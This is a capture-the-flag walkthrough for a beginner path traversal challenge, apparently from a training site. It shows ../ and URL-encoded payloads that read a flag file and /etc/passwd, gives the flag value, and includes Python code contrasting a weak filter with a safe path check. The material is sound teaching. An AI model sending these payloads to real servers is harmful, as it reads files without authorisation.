HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

FileVault — Path Traversal Intro

Difficulty: Beginner
Vuln class: Path Traversal
Steps: 3
// Objective
Escape the base directory by injecting ../ sequences in the file parameter to read /flag.txt.
// Tools required
Browser, curl, Burp Suite
// Step-by-step walkthrough
1. Observe the file loading parameter
The app loads files via a ?file= parameter. Try a normal file first to see how it works.
Command / Input
GET /view?file=readme.txt
Output
Welcome to FileVault...
2. Inject path traversal sequences
Attempt to escape the base directory using ../ sequences to reach /flag.txt.
Command / Input
GET /view?file=../../../../flag.txt
Output
HackrGG{p4th_tr4v3rs4l_1ntr0_d0n3}
The number of ../ sequences needed depends on the depth of the base directory.
3. Try URL-encoded bypass if blocked
If filters strip ../, try URL-encoding: %2e%2e%2f or %2e%2e/
Command / Input
GET /view?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd
If the filter strips the literal string "../" but does not URL-decode the input first, the encoded sequences pass through it unchanged and are decoded afterwards.
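Why steps 2 and 3 work, and the check that stops both, as an added example (not FileVault's own code). It assumes the handler receives the raw, undecoded value of ?file=; the function names and the base directory are hypothetical, and the parameter values are the ones used above.

```python
import os
import tempfile
from urllib.parse import unquote

def naive_resolve(base, raw_param):
    """Weak pattern from step 3: strip literal '../' first, URL-decode afterwards."""
    filtered = raw_param.replace("../", "")
    return os.path.normpath(os.path.join(base, unquote(filtered)))

def safe_resolve(base, raw_param):
    """Decode once, canonicalise, then require the result to stay under base."""
    base_real = os.path.realpath(base)
    # realpath collapses ../ and follows symlinks; join() lets an absolute
    # parameter replace base entirely, which the containment check also catches.
    candidate = os.path.realpath(os.path.join(base_real, unquote(raw_param)))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PermissionError("path escapes base directory")
    return candidate

def is_inside(base, path):
    """True if path, once canonicalised, is base itself or lies beneath it."""
    base_real = os.path.realpath(base)
    return os.path.commonpath([base_real, os.path.realpath(path)]) == base_real

def compare(base, raw_param):
    """Return (naive result stays inside base?, safe_resolve accepts?)."""
    naive_ok = is_inside(base, naive_resolve(base, raw_param))
    try:
        safe_resolve(base, raw_param)
        return naive_ok, True
    except PermissionError:
        return naive_ok, False

if __name__ == "__main__":
    # Constructed base directory; the parameter values are the ones in the walkthrough.
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "app", "files")
        os.makedirs(base)
        for raw in ("readme.txt", "../../../../flag.txt",
                    "%2e%2e%2f%2e%2e%2fetc%2fpasswd"):
            naive_ok, safe_ok = compare(base, raw)
            print(f"{raw!r:40} naive stays inside: {naive_ok!s:5} safe accepts: {safe_ok}")
```

The containment check runs on the decoded, canonical path, so it gives the same answer for the plain and the encoded form of the request.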
// Flag
Flag value: HackrGG{p4th_tr4v3rs4l_1ntr0_d0n3}
At /flag.txt, reached by escaping the base directory with ../ sequences.